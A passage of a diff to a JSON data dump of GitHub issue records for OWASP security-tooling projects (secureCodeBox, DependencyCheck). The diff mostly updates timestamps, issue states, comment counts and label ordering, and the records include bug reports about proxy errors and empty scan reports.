with stakeholders to gather detailed requirements for the CLI tool, including features, user needs, and any existing pain points with the current system.\n\n2. **Design the CLI Structure**: \n - Utilize a CLI design tool (like Cobra) to outline the command structure, subcommands, and arguments for creating, observing, and managing scans and scanners.\n\n3. **Implement Command Handlers**: \n - Develop the core functionalities for each command:\n - `scan` command for initiating scans.\n - `trigger` command for executing scheduled scans.\n - Commands for managing scanners and hooks.\n\n4. **Implement Logging and Progress Tracking**: \n - Integrate logging functionality to allow users to view real-time logs of scans and parsers as they execute, including a summary of results.\n\n5. **Create Configuration Options**: \n - Allow users to configure parameters through flags or a configuration file, enabling customization of scans and hooks.\n\n6. **User Authentication and Authorization**: \n - Implement security measures for user authentication and permissions to ensure that only authorized users can trigger scans and access sensitive data.\n\n7. **Testing**: \n - Conduct unit and integration tests to ensure that all commands work as intended and handle edge cases gracefully.\n\n8. **Documentation**: \n - Write comprehensive documentation for the CLI tool, including usage examples, command descriptions, and troubleshooting tips.\n\n9. **Feedback Loop**: \n - Release a beta version to gather feedback from users and developers, allowing for iterative improvements based on real-world usage.\n\n10. **Deployment and Maintenance**: \n - Plan for the deployment of the CLI tool, and establish a maintenance schedule for updates, bug fixes, and feature enhancements based on user feedback.\n\nBy following these steps, you can systematically approach the development of the secureCodeBox CLI tool to meet the needs of its users effectively.", "state": "open", @@ -109381,11 +109387,12 @@ "comments_count": 4, "closed_at": null, "created_at": "2020-11-02T13:51:16Z", - "updated_at": "2024-06-28T09:33:17Z", + "updated_at": "2024-09-20T09:37:26Z", "author": 1613, "repository": 1339, "assignees": [ - 49 + 49, + 1612 ], "labels": [ 719, @@ -109539,9 +109546,9 @@ "repository": 1339, "assignees": [], "labels": [ - 719, 721, - 724 + 724, + 719 ] } }, @@ -109695,8 +109702,8 @@ "repository": 1339, "assignees": [], "labels": [ - 721, - 728 + 728, + 721 ] } }, @@ -109756,8 +109763,8 @@ "repository": 1339, "assignees": [], "labels": [ - 721, - 728 + 728, + 721 ] } }, @@ -109847,8 +109854,8 @@ "repository": 1339, "assignees": [], "labels": [ - 719, - 722 + 722, + 719 ] } }, @@ -110544,10 +110551,10 @@ "repository": 1339, "assignees": [], "labels": [ - 727, 729, 730, - 732 + 732, + 727 ] } }, @@ -110577,9 +110584,9 @@ "repository": 1339, "assignees": [], "labels": [ - 719, 722, - 733 + 733, + 719 ] } }, @@ -110639,8 +110646,8 @@ "repository": 1339, "assignees": [], "labels": [ - 719, - 721 + 721, + 719 ] } }, @@ -110670,8 +110677,8 @@ "repository": 1339, "assignees": [], "labels": [ - 719, - 722 + 722, + 719 ] } }, @@ -110731,8 +110738,8 @@ "repository": 1339, "assignees": [], "labels": [ - 718, - 734 + 734, + 718 ] } }, @@ -110762,8 +110769,8 @@ "repository": 1339, "assignees": [], "labels": [ - 719, - 722 + 722, + 719 ] } }, @@ -110823,8 +110830,8 @@ "repository": 1339, "assignees": [], "labels": [ - 719, - 735 + 735, + 719 ] } }, @@ -110854,8 +110861,8 @@ "repository": 1339, "assignees": [], "labels": [ - 719, - 734 + 734, + 719 ] } }, @@ -110885,8 +110892,8 @@ "repository": 1339, "assignees": [], "labels": [ - 723, - 728 + 728, + 723 ] } }, @@ -110916,8 +110923,8 @@ "repository": 1339, "assignees": [], "labels": [ - 718, - 722 + 722, + 718 ] } }, @@ -110947,8 +110954,8 @@ "repository": 1339, "assignees": [], "labels": [ - 718, - 723 + 723, + 718 ] } }, @@ -110978,8 +110985,8 @@ "repository": 1339, "assignees": [], "labels": [ - 718, - 721 + 721, + 718 ] } }, @@ -111127,9 +111134,9 @@ "repository": 1339, "assignees": [], "labels": [ - 719, 723, - 734 + 734, + 719 ] } }, @@ -111159,9 +111166,9 @@ "repository": 1339, "assignees": [], "labels": [ - 719, + 736, 729, - 736 + 719 ] } }, @@ -111191,9 +111198,9 @@ "repository": 1339, "assignees": [], "labels": [ - 719, 721, - 723 + 723, + 719 ] } }, @@ -111223,8 +111230,8 @@ "repository": 1339, "assignees": [], "labels": [ - 718, - 728 + 728, + 718 ] } }, @@ -111255,8 +111262,8 @@ "assignees": [], "labels": [ 721, - 727, - 737 + 737, + 727 ] } }, @@ -111382,8 +111389,8 @@ "repository": 1339, "assignees": [], "labels": [ - 719, - 737 + 737, + 719 ] } }, @@ -111473,9 +111480,9 @@ "repository": 1339, "assignees": [], "labels": [ - 718, 722, - 726 + 726, + 718 ] } }, @@ -111657,8 +111664,8 @@ "repository": 1339, "assignees": [], "labels": [ - 718, - 722 + 722, + 718 ] } }, @@ -112016,8 +112023,8 @@ "repository": 1339, "assignees": [], "labels": [ - 719, - 724 + 724, + 719 ] } }, @@ -112056,7 +112063,7 @@ "pk": 3710, "fields": { "nest_created_at": "2024-09-12T00:19:53.196Z", - "nest_updated_at": "2024-09-12T00:19:53.196Z", + "nest_updated_at": "2024-09-20T18:23:20.746Z", "node_id": "I_kwDOBM-Q_c6OfiVw", "title": "Typo3Scan is in public archive and no longer maintained", "body": "It's rather an FYI - the implemented typo3scan is no longer maintained by the developer and should be considered to deprecate it in SCB as well?\r\n \r\nhttps://github.com/whoot/Typo3Scan\r\n", @@ -112069,10 +112076,10 @@ "sequence_id": 2390631792, "is_locked": false, "lock_reason": "", - "comments_count": 1, + "comments_count": 2, "closed_at": null, "created_at": "2024-07-04T11:22:00Z", - "updated_at": "2024-07-04T18:19:52Z", + "updated_at": "2024-09-20T09:46:12Z", "author": 1635, "repository": 1339, "assignees": [], @@ -112203,8 +112210,8 @@ "repository": 1339, "assignees": [], "labels": [ - 718, - 730 + 730, + 718 ] } }, @@ -112273,23 +112280,23 @@ "pk": 3717, "fields": { "nest_created_at": "2024-09-12T00:20:03.863Z", - "nest_updated_at": "2024-09-12T00:20:03.863Z", + "nest_updated_at": "2024-09-20T18:23:21.732Z", "node_id": "I_kwDOBM-Q_c6V-1PW", "title": "Remove deprecated SSH_scan", "body": "The SSH_scan has been deprecated for some time now and has been replaced with the SSH-audit. \r\nThe SSH_scan should be marked as deprecated in the documentation and removed in the next release. ", "summary": "Mark SSH_scan as deprecated in the documentation and remove it in the next release, since it has been replaced by SSH-audit. Ensure that all references to SSH_scan are updated accordingly. Confirm the completion of these tasks to maintain codebase integrity.", "hint": "Here are possible steps to approach the problem of removing the deprecated SSH_scan:\n\n1. **Review Documentation**: Examine the current documentation to identify where SSH_scan is referenced and how it is described.\n\n2. **Update Documentation**: Draft updates to the documentation to mark SSH_scan as deprecated, including information about the replacement with SSH-audit.\n\n3. **Notify Stakeholders**: Inform relevant stakeholders (developers, users, etc.) about the planned removal of SSH_scan and encourage them to transition to SSH-audit.\n\n4. **Code Review**: Investigate the codebase to locate all instances of SSH_scan usage, including function calls, configurations, and tests.\n\n5. **Plan Migration**: Create a plan for migrating any necessary functionality from SSH_scan to SSH-audit, ensuring all features are covered.\n\n6. **Implement Changes**: Modify the codebase to replace SSH_scan with SSH-audit, following the migration plan.\n\n7. **Update Tests**: Revise existing tests that rely on SSH_scan to ensure they are now using SSH-audit and add new tests as necessary.\n\n8. **Perform Testing**: Conduct thorough testing to ensure that the removal of SSH_scan does not introduce any issues and that SSH-audit functions correctly.\n\n9. **Prepare Release Notes**: Draft release notes highlighting the removal of SSH_scan, including deprecation details and instructions for users to transition to SSH-audit.\n\n10. **Release**: Finalize and release the new version of the software with the deprecated SSH_scan removed and the updated documentation published.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/secureCodeBox/secureCodeBox/issues/2651", "number": 2651, "sequence_id": 2516276182, "is_locked": false, "lock_reason": "", - "comments_count": 0, - "closed_at": null, + "comments_count": 1, + "closed_at": "2024-09-20T09:54:56Z", "created_at": "2024-09-10T12:14:58Z", - "updated_at": "2024-09-10T12:14:58Z", + "updated_at": "2024-09-20T09:54:57Z", "author": 1638, "repository": 1339, "assignees": [], @@ -112303,26 +112310,28 @@ "pk": 3718, "fields": { "nest_created_at": "2024-09-12T00:20:05.083Z", - "nest_updated_at": "2024-09-16T22:24:46.626Z", + "nest_updated_at": "2024-09-20T18:23:22.749Z", "node_id": "I_kwDOBM-Q_c6WCYGp", "title": "Make the istio annotation on jobs configurable", "body": "## ➹ New Feature implementation request\r\n\r\n\r\n### Is your feature request related to a problem?\r\n\r\nJobs don't function in clusters with STRICT mTLS.\r\n\r\n### Describe the solution you'd like\r\n\r\nThe ability to overwrite the annotation that disables istio injection. This annotation: `sidecar.istio.io/inject = false`\r\n\r\n### Additional context\r\n\r\nThis is running in a cluster that uses [UDS - Core](https://github.com/defenseunicorns/uds-core) which has an [application](https://github.com/defenseunicorns/pepr) that handles exiting the sidecar on jobs.", "summary": "Implement a feature to make the Istio annotation on jobs configurable by allowing users to overwrite the default annotation that disables Istio sidecar injection, specifically `sidecar.istio.io/inject = false`. This enhancement addresses issues faced by users operating in clusters with STRICT mTLS, enabling improved functionality for jobs. Facilitate this change to support applications like UDS - Core that manage sidecar behavior on job executions.", "hint": "To make the Istio annotation on jobs configurable, you can follow these possible steps:\n\n1. **Requirement Gathering**:\n - Identify specific requirements from stakeholders regarding how the configuration should work, including any preferences for default values, custom values, and whether this should be applied at a global or job-specific level.\n\n2. **Design the Configuration Schema**:\n - Decide on a configuration format (e.g., YAML, JSON) that will allow users to specify the desired Istio annotation for jobs. Consider how this configuration will be used and stored.\n\n3. **Modify Job Specification**:\n - Update the job specification template to include a new field for the custom Istio annotation, allowing users to provide their desired value for the `sidecar.istio.io/inject` annotation.\n\n4. **Implement Configuration Logic**:\n - Write the necessary logic to read the new configuration value and apply it to the job manifest before creation. Ensure that the default behavior remains unchanged if no custom value is provided.\n\n5. **Testing**:\n - Develop unit and integration tests to ensure that the new configuration works correctly, including scenarios where the annotation is set to `false`, `true`, or omitted.\n\n6. **Documentation**:\n - Update the documentation to explain how to use the new annotation configuration feature, including examples and any potential impacts on job execution in mTLS environments.\n\n7. **User Feedback**:\n - Share the feature with a small group of users to collect feedback and identify any issues or additional needs that may arise.\n\n8. **Iterate Based on Feedback**:\n - Make any necessary adjustments based on user feedback to improve functionality or usability of the feature.\n\n9. **Release Management**:\n - Plan for a release that includes this feature, ensuring that all dependencies and related components are updated accordingly.\n\n10. **Monitor and Support**:\n - After the feature is released, monitor its usage and performance. Be prepared to provide support to users who may encounter issues or have questions about the new configuration option.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/secureCodeBox/secureCodeBox/issues/2652", "number": 2652, "sequence_id": 2517205417, "is_locked": false, "lock_reason": "", - "comments_count": 3, - "closed_at": null, + "comments_count": 4, + "closed_at": "2024-09-20T09:56:54Z", "created_at": "2024-09-10T18:02:27Z", - "updated_at": "2024-09-13T07:04:03Z", + "updated_at": "2024-09-20T09:56:54Z", "author": 1639, "repository": 1339, - "assignees": [], + "assignees": [ + 1639 + ], "labels": [ 719 ] @@ -112393,7 +112402,7 @@ "pk": 3721, "fields": { "nest_created_at": "2024-09-12T00:21:14.416Z", - "nest_updated_at": "2024-09-18T19:03:27.628Z", + "nest_updated_at": "2024-09-22T19:26:52.445Z", "node_id": "I_kwDOAvMiTs536ECl", "title": "Upgrade to OWASP DependencyCheck v9.0.1", "body": "Would it be possible to foresee an upgrade to [OWASP DependencyCheck v9.0.1](https://github.com/jeremylong/DependencyCheck/releases/tag/v9.0.1)? The main driver for this is the update for the new NVD API which now requires an API key. Using the previous API will be deprecated on December 15th 2023 (see [here](https://nvd.nist.gov/General/News/change-timeline) for details).", @@ -113133,7 +113142,7 @@ "pk": 3747, "fields": { "nest_created_at": "2024-09-12T00:22:20.065Z", - "nest_updated_at": "2024-09-18T19:03:32.096Z", + "nest_updated_at": "2024-09-22T19:27:01.883Z", "node_id": "I_kwDOAszRr86V-B3E", "title": "Empty report after update to 10.0.4", "body": "Hi,\r\n\r\nwe are using the dependency check Gradle plugin to scan our multi-module Kotlin project.\r\n\r\nEverything worked as expected until version **10.0.3** (included) but after the update to version **10.0.4** the result of the `dependencyCheckAggregate` task is an empty XML report (the list of dependencies is always empty).\r\n\r\nThe dependency check Gradle plugin is configured as follows:\r\n```\r\ndependencyCheck {\r\n format = XML.toString()\r\n scanProjects = listOf(\":application\")\r\n scanConfigurations = listOf(\"runtimeClasspath\")\r\n skipGroups = listOf(\"com.example\")\r\n nvd.datafeedUrl = \"https://example.com/scan/api/v1/nvdcache\"\r\n nvd.datafeedUser = \"user\"\r\n nvd.datafeedPassword = \"secret\"\r\n}\r\n```\r\n\r\nWhen I comment out the `scanProjects` parameter the report contains a lot of dependencies but also dependencies of our testing modules which we want to exclude from the scan.\r\n\r\nIs the configuration somehow wrong or what happened between these 2 latest releases that can cause such a behavior? I went through the latest commits but nothing suspicious for me.\r\n\r\nI tested this behavior with Gradle 8.8 and 8.10.1.\r\n\r\nThank you for any help,\r\nPetr", @@ -113146,10 +113155,10 @@ "sequence_id": 2516065732, "is_locked": false, "lock_reason": "", - "comments_count": 0, + "comments_count": 5, "closed_at": null, "created_at": "2024-09-10T10:36:45Z", - "updated_at": "2024-09-17T14:08:06Z", + "updated_at": "2024-09-20T11:00:15Z", "author": 1670, "repository": 1341, "assignees": [], @@ -113210,8 +113219,8 @@ "repository": 1342, "assignees": [], "labels": [ - 743, - 744 + 744, + 743 ] } }, @@ -113305,8 +113314,8 @@ "repository": 1342, "assignees": [], "labels": [ - 743, - 746 + 746, + 743 ] } }, @@ -113336,8 +113345,8 @@ "repository": 1342, "assignees": [], "labels": [ - 743, - 746 + 746, + 743 ] } }, @@ -113346,7 +113355,7 @@ "pk": 3754, "fields": { "nest_created_at": "2024-09-12T00:22:53.008Z", - "nest_updated_at": "2024-09-18T19:03:36.545Z", + "nest_updated_at": "2024-09-22T19:27:20.985Z", "node_id": "I_kwDOAbywoc5NoU_X", "title": "Vunerabilities found during dependency check is not shown in sonar UI", "body": "**Describe the bug**\r\n\r\nWe are using SonarQube 9.2.4 and dependency-check 7.1.1, dependency-check-sonar-plugin:2.0.8\r\n\r\nAs seen from our build output the the dependency check report (json) was analysed and was sucessfully uploaded in sonar\r\n![Screenshot 2022-07-12 at 18 21 00](https://user-images.githubusercontent.com/1481305/178550866-6a267f4e-458d-4432-b176-a3d5ac53d3e7.png)\r\n\r\nIn sonarqube Ui under \"dependency check\" option as well we see the html report is available.\r\n\r\n![Screenshot 2022-07-12 at 19 06 36](https://user-images.githubusercontent.com/1481305/178551449-65afd5ea-712c-4f99-ba8f-5e58fbded68b.png)\r\n\r\nBut We are not seeing these vulnerabilities numbers updated in the over all view section under vulnerabilities as seen below\r\n![Screenshot 2022-07-12 at 18 20 39](https://user-images.githubusercontent.com/1481305/178551753-eb831356-b737-40bf-91d0-8bc0c7d7756f.png)\r\n\r\nI am using the following in our pom taking this example for multi module https://github.com/dependency-check/dependency-check-sonar-plugin/blob/master/examples/multi-module-maven/pom.xml as reference\r\n```\r\n \r\n target/dependency-check-report.json\r\n target/dependency-check-report.html\r\n \r\n\r\n\r\n \r\n org.sonarsource.scanner.maven\r\n sonar-maven-plugin\r\n \r\n \r\n org.owasp\r\n dependency-check-maven\r\n 7.1.1.\r\n \r\n \r\n \r\n aggregate\r\n \r\n \r\n \r\n \r\n \r\n ALL\r\n \r\n \r\n \r\n\r\n```\r\n**Expected behavior**\r\nExpect to see the details under Vulnerabilities section too. Ie the counts of vulnerabilities and details of each vulnerabilities as shown [here](https://nullbeans.com/integrate-owasp-dependency-check-reports-with-sonarqube/)\r\n\r\nIs there any thing left to be configured or something i have missed? Any help in debugging this further would be really appreciated.\r\n\r\n\r\n", @@ -113402,8 +113411,8 @@ 1672 ], "labels": [ - 743, - 746 + 746, + 743 ] } }, @@ -113433,8 +113442,8 @@ "repository": 1342, "assignees": [], "labels": [ - 743, - 746 + 746, + 743 ] } }, @@ -113495,8 +113504,8 @@ "repository": 1342, "assignees": [], "labels": [ - 743, - 746 + 746, + 743 ] } }, @@ -113747,7 +113756,7 @@ "pk": 3767, "fields": { "nest_created_at": "2024-09-12T00:23:45.898Z", - "nest_updated_at": "2024-09-18T19:03:42.041Z", + "nest_updated_at": "2024-09-22T19:27:32.634Z", "node_id": "I_kwDOCfERsc5v2FJk", "title": "Filter reports", "body": "Do NOT save empty or otherwise uninteresting reports as artifacts, if possible.\r\n \r\n * identify empty reports:\r\n * check csv number of lines\r\n * check for text string in html files\r\n * Check for \"Vulnerable Dependencies: 0\"\r\n * add option to only save HTML files as artifacts (no JSON, CSV etc)", @@ -116214,8 +116223,8 @@ "repository": 1345, "assignees": [], "labels": [ - 748, - 752 + 752, + 748 ] } }, @@ -116431,8 +116440,8 @@ "repository": 1345, "assignees": [], "labels": [ - 748, - 753 + 753, + 748 ] } }, @@ -116464,8 +116473,8 @@ 791 ], "labels": [ - 748, - 754 + 754, + 748 ] } }, @@ -117752,8 +117761,8 @@ "repository": 1345, "assignees": [], "labels": [ - 748, - 754 + 754, + 748 ] } }, @@ -118022,8 +118031,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, - 757 + 757, + 749 ] } }, @@ -119454,8 +119463,8 @@ "repository": 1345, "assignees": [], "labels": [ - 748, - 754 + 754, + 748 ] } }, @@ -119605,8 +119614,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, - 760 + 760, + 749 ] } }, @@ -119756,9 +119765,9 @@ "repository": 1345, "assignees": [], "labels": [ + 761, 749, - 758, - 761 + 758 ] } }, @@ -119788,8 +119797,8 @@ "repository": 1345, "assignees": [], "labels": [ - 748, - 754 + 754, + 748 ] } }, @@ -119851,9 +119860,9 @@ "repository": 1345, "assignees": [], "labels": [ + 761, 749, - 758, - 761 + 758 ] } }, @@ -120003,8 +120012,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, - 761 + 761, + 749 ] } }, @@ -120276,8 +120285,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, 754, + 749, 758 ] } @@ -120669,9 +120678,9 @@ "repository": 1345, "assignees": [], "labels": [ + 761, 749, - 758, - 761 + 758 ] } }, @@ -120701,9 +120710,9 @@ "repository": 1345, "assignees": [], "labels": [ - 751, 753, - 754 + 754, + 751 ] } }, @@ -120733,9 +120742,9 @@ "repository": 1345, "assignees": [], "labels": [ - 748, 752, - 754 + 754, + 748 ] } }, @@ -120855,8 +120864,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, - 754 + 754, + 749 ] } }, @@ -121006,8 +121015,8 @@ "repository": 1345, "assignees": [], "labels": [ - 751, - 762 + 762, + 751 ] } }, @@ -121127,8 +121136,8 @@ "repository": 1345, "assignees": [], "labels": [ - 748, - 762 + 762, + 748 ] } }, @@ -121188,8 +121197,8 @@ "repository": 1345, "assignees": [], "labels": [ - 748, - 761 + 761, + 748 ] } }, @@ -121219,8 +121228,8 @@ "repository": 1345, "assignees": [], "labels": [ - 748, - 754 + 754, + 748 ] } }, @@ -121583,9 +121592,9 @@ "repository": 1345, "assignees": [], "labels": [ - 751, 754, - 758 + 758, + 751 ] } }, @@ -121615,8 +121624,8 @@ "repository": 1345, "assignees": [], "labels": [ - 751, - 752 + 752, + 751 ] } }, @@ -121768,9 +121777,9 @@ "repository": 1345, "assignees": [], "labels": [ - 748, + 761, 755, - 761 + 748 ] } }, @@ -122041,8 +122050,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, 753, + 749, 758 ] } @@ -122164,8 +122173,8 @@ "repository": 1345, "assignees": [], "labels": [ - 751, - 758 + 758, + 751 ] } }, @@ -122225,8 +122234,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, - 754 + 754, + 749 ] } }, @@ -123215,8 +123224,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, - 754 + 754, + 749 ] } }, @@ -124116,8 +124125,8 @@ "repository": 1345, "assignees": [], "labels": [ - 748, - 754 + 754, + 748 ] } }, @@ -124541,9 +124550,9 @@ "repository": 1345, "assignees": [], "labels": [ + 761, 749, - 758, - 761 + 758 ] } }, @@ -124727,9 +124736,9 @@ "repository": 1345, "assignees": [], "labels": [ + 754, 748, - 751, - 754 + 751 ] } }, @@ -124879,8 +124888,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, 757, + 749, 758 ] } @@ -125002,8 +125011,8 @@ "repository": 1345, "assignees": [], "labels": [ - 748, - 754 + 754, + 748 ] } }, @@ -125215,8 +125224,8 @@ "repository": 1345, "assignees": [], "labels": [ - 751, - 752 + 752, + 751 ] } }, @@ -126180,8 +126189,8 @@ "repository": 1345, "assignees": [], "labels": [ - 751, - 754 + 754, + 751 ] } }, @@ -126211,8 +126220,8 @@ "repository": 1345, "assignees": [], "labels": [ - 751, - 754 + 754, + 751 ] } }, @@ -126273,9 +126282,9 @@ "repository": 1345, "assignees": [], "labels": [ + 754, 748, - 751, - 754 + 751 ] } }, @@ -126305,8 +126314,8 @@ "repository": 1345, "assignees": [], "labels": [ - 751, - 754 + 754, + 751 ] } }, @@ -126427,8 +126436,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, - 754 + 754, + 749 ] } }, @@ -126728,9 +126737,9 @@ "repository": 1345, "assignees": [], "labels": [ - 749, 753, - 754 + 754, + 749 ] } }, @@ -127090,8 +127099,8 @@ "repository": 1345, "assignees": [], "labels": [ - 751, - 754 + 754, + 751 ] } }, @@ -127242,8 +127251,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, - 754 + 754, + 749 ] } }, @@ -127485,8 +127494,8 @@ "repository": 1345, "assignees": [], "labels": [ - 751, - 754 + 754, + 751 ] } }, @@ -128118,8 +128127,8 @@ "repository": 1345, "assignees": [], "labels": [ - 748, - 754 + 754, + 748 ] } }, @@ -128269,8 +128278,8 @@ "repository": 1345, "assignees": [], "labels": [ - 751, - 752 + 752, + 751 ] } }, @@ -128360,8 +128369,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, - 754 + 754, + 749 ] } }, @@ -128481,8 +128490,8 @@ "repository": 1345, "assignees": [], "labels": [ - 751, - 754 + 754, + 751 ] } }, @@ -128871,8 +128880,8 @@ "repository": 1345, "assignees": [], "labels": [ - 751, - 754 + 754, + 751 ] } }, @@ -129448,8 +129457,8 @@ "repository": 1345, "assignees": [], "labels": [ - 751, - 755 + 755, + 751 ] } }, @@ -129548,7 +129557,7 @@ "pk": 4290, "fields": { "nest_created_at": "2024-09-12T00:35:35.107Z", - "nest_updated_at": "2024-09-12T00:35:35.107Z", + "nest_updated_at": "2024-09-19T07:31:46.365Z", "node_id": "I_kwDOAFZscc6Odzhv", "title": "Downloads after NVD init don't seem to be using proxy settings correctly", "body": "**Describe the bug**\r\nWe have a corporate proxy in place and I am providing the settings including proxy user and proxy pass through the JAVA_TOOL_OPTIONS as described in the documentation.\r\n\r\nThis works for the NVD updates, but as soon as I get to the the point where it wants to init the retireJS repo or download the publishedSupressions.xml, then I receive a 407 error from the proxy.\r\n\r\n**Version of dependency-check used**\r\nThe problem occurs using version 10.0.1\r\n\r\n**Log file**\r\n```\r\n[INFO] Checking for updates\r\n[INFO] Skipping the NVD API Update as it was completed within the last 240 minutes\r\n[ERROR] Failed to initialize the RetireJS repo\r\norg.owasp.dependencycheck.data.update.exception.UpdateException: Failed to initialize the RetireJS repo\r\n at org.owasp.dependencycheck.data.update.RetireJSDataSource.initializeRetireJsRepo(RetireJSDataSource.java:152)\r\n at org.owasp.dependencycheck.data.update.RetireJSDataSource.update(RetireJSDataSource.java:95)\r\n at org.owasp.dependencycheck.Engine.doUpdates(Engine.java:906)\r\n at org.owasp.dependencycheck.Engine.initializeAndUpdateDatabase(Engine.java:711)\r\n at org.owasp.dependencycheck.Engine.analyzeDependencies(Engine.java:637)\r\n at org.owasp.dependencycheck.App.runScan(App.java:262)\r\n at org.owasp.dependencycheck.App.run(App.java:194)\r\n at org.owasp.dependencycheck.App.main(App.java:89)\r\nCaused by: org.owasp.dependencycheck.utils.DownloadFailedException: Download failed, unable to copy 'https://raw.githubusercontent.com/Retirejs/retire.js/master/repository/jsrepository.json' to 'C:\\actions-runner\\_work\\NSDT\\dependency-check\\data\\jsrepository.json'; Error downloading file https://raw.githubusercontent.com/Retirejs/retire.js/master/repository/jsrepository.json; unable to connect.\r\n at org.owasp.dependencycheck.utils.Downloader.fetchFile(Downloader.java:152)\r\n at org.owasp.dependencycheck.utils.Downloader.fetchFile(Downloader.java:100)\r\n at org.owasp.dependencycheck.data.update.RetireJSDataSource.initializeRetireJsRepo(RetireJSDataSource.java:150)\r\n ... 7 common frames omitted\r\nCaused by: org.owasp.dependencycheck.utils.DownloadFailedException: Error downloading file https://raw.githubusercontent.com/Retirejs/retire.js/master/repository/jsrepository.json; unable to connect.\r\n at org.owasp.dependencycheck.utils.HttpResourceConnection.obtainConnection(HttpResourceConnection.java:267)\r\n at org.owasp.dependencycheck.utils.HttpResourceConnection.fetch(HttpResourceConnection.java:163)\r\n at org.owasp.dependencycheck.utils.Downloader.fetchFile(Downloader.java:138)\r\n ... 9 common frames omitted\r\nCaused by: java.io.IOException: Unable to tunnel through proxy. Proxy returns \"HTTP/1.1 407 Proxy Authentication Required\"\r\n at java.base/sun.net.www.protocol.http.HttpURLConnection.doTunneling0(HttpURLConnection.java:2271)\r\n at java.base/sun.net.www.protocol.http.HttpURLConnection.doTunneling(HttpURLConnection.java:2143)\r\n at java.base/sun.net.www.protocol.https.AbstractDelegateHttpsURLConnection.connect(AbstractDelegateHttpsURLConnection.java:185)\r\n at java.base/sun.net.www.protocol.https.HttpsURLConnectionImpl.connect(HttpsURLConnectionImpl.java:141)\r\n at org.owasp.dependencycheck.utils.HttpResourceConnection.obtainConnection(HttpResourceConnection.java:206)\r\n ... 11 common frames omitted\r\n[WARN] Failed to update hosted suppressions file, results may contain false positives already resolved by the DependencyCheck project\r\norg.owasp.dependencycheck.data.update.exception.UpdateException: Failed to update the hosted suppressions file\r\n at org.owasp.dependencycheck.data.update.HostedSuppressionsDataSource.fetchHostedSuppressions(HostedSuppressionsDataSource.java:156)\r\n at org.owasp.dependencycheck.data.update.HostedSuppressionsDataSource.update(HostedSuppressionsDataSource.java:87)\r\n at org.owasp.dependencycheck.Engine.doUpdates(Engine.java:906)\r\n at org.owasp.dependencycheck.Engine.initializeAndUpdateDatabase(Engine.java:711)\r\n at org.owasp.dependencycheck.Engine.analyzeDependencies(Engine.java:637)\r\n at org.owasp.dependencycheck.App.runScan(App.java:262)\r\n at org.owasp.dependencycheck.App.run(App.java:194)\r\n at org.owasp.dependencycheck.App.main(App.java:89)\r\nCaused by: org.owasp.dependencycheck.utils.DownloadFailedException: Download failed, unable to copy 'https://jeremylong.github.io/DependencyCheck/suppressions/publishedSuppressions.xml' to 'C:\\actions-runner\\_work\\NSDT\\dependency-check\\data\\publishedSuppressions.xml'; Error downloading file https://jeremylong.github.io/DependencyCheck/suppressions/publishedSuppressions.xml; unable to connect.\r\n at org.owasp.dependencycheck.utils.Downloader.fetchFile(Downloader.java:152)\r\n at org.owasp.dependencycheck.utils.Downloader.fetchFile(Downloader.java:83)\r\n at org.owasp.dependencycheck.data.update.HostedSuppressionsDataSource.fetchHostedSuppressions(HostedSuppressionsDataSource.java:154)\r\n ... 7 common frames omitted\r\nCaused by: org.owasp.dependencycheck.utils.DownloadFailedException: Error downloading file https://jeremylong.github.io/DependencyCheck/suppressions/publishedSuppressions.xml; unable to connect.\r\n at org.owasp.dependencycheck.utils.HttpResourceConnection.obtainConnection(HttpResourceConnection.java:267)\r\n at org.owasp.dependencycheck.utils.HttpResourceConnection.fetch(HttpResourceConnection.java:163)\r\n at org.owasp.dependencycheck.utils.Downloader.fetchFile(Downloader.java:138)\r\n ... 9 common frames omitted\r\nCaused by: java.io.IOException: Unable to tunnel through proxy. Proxy returns \"HTTP/1.1 407 Proxy Authentication Required\"\r\n at java.base/sun.net.www.protocol.http.HttpURLConnection.doTunneling0(HttpURLConnection.java:2271)\r\n at java.base/sun.net.www.protocol.http.HttpURLConnection.doTunneling(HttpURLConnection.java:2143)\r\n at java.base/sun.net.www.protocol.https.AbstractDelegateHttpsURLConnection.connect(AbstractDelegateHttpsURLConnection.java:185)\r\n at java.base/sun.net.www.protocol.https.HttpsURLConnectionImpl.connect(HttpsURLConnectionImpl.java:141)\r\n at org.owasp.dependencycheck.utils.HttpResourceConnection.obtainConnection(HttpResourceConnection.java:206)\r\n ... 11 common frames omitted\r\n[INFO] Updating CISA Known Exploited Vulnerability list: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json\r\n[ERROR] org.owasp.dependencycheck.utils.DownloadFailedException: Error downloading file https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; unable to connect.\r\norg.owasp.dependencycheck.data.update.exception.UpdateException: org.owasp.dependencycheck.utils.DownloadFailedException: Error downloading file https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; unable to connect.\r\n at org.owasp.dependencycheck.data.update.KnownExploitedDataSource.update(KnownExploitedDataSource.java:93)\r\n at org.owasp.dependencycheck.Engine.doUpdates(Engine.java:906)\r\n at org.owasp.dependencycheck.Engine.initializeAndUpdateDatabase(Engine.java:711)\r\n at org.owasp.dependencycheck.Engine.analyzeDependencies(Engine.java:637)\r\n at org.owasp.dependencycheck.App.runScan(App.java:262)\r\n at org.owasp.dependencycheck.App.run(App.java:194)\r\n at org.owasp.dependencycheck.App.main(App.java:89)\r\nCaused by: org.owasp.dependencycheck.utils.DownloadFailedException: Error downloading file https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; unable to connect.\r\n at org.owasp.dependencycheck.utils.HttpResourceConnection.obtainConnection(HttpResourceConnection.java:267)\r\n at org.owasp.dependencycheck.utils.HttpResourceConnection.fetch(HttpResourceConnection.java:163)\r\n at org.owasp.dependencycheck.data.update.KnownExploitedDataSource.update(KnownExploitedDataSource.java:80)\r\n ... 6 common 